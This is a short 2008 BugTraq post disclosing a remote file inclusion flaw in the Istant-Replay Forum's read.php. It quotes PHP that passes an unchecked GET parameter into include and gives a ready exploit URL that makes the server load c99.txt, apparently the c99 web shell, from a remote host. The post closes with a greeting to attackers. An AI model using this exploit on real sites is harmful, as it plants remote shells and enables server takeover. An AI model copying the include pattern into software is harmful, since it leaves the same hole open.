Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
remote file include Apr 15 2008 07:13PM
win32 exe w cn
########################################################################
#

Istant-Replay Forum Remote File Inclusion Vulnerability

########################################################################
#

## AUTHOR: THuGM4N

## Email : Win32.exe (at) w (dot) cn [email concealed]

## Script : Istant-Replay Forum

## Site : http://www.chattaitaliano.com

## Vulnerable CODE :

~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~

$a = $_GET['data'];

$b = $_GET['post'];

$foo = include "$a.txt";

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## BUT THE EXPLOIT IS LIKE THAT :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?

## BIGUP 2 All Attackers Around The World .

########################################################################
#

Istant-Replay Forum Remote File Inclusion Vulnerability

########################################################################
#

[ reply ]




 

Privacy Statement
Copyright 2009, SecurityFocus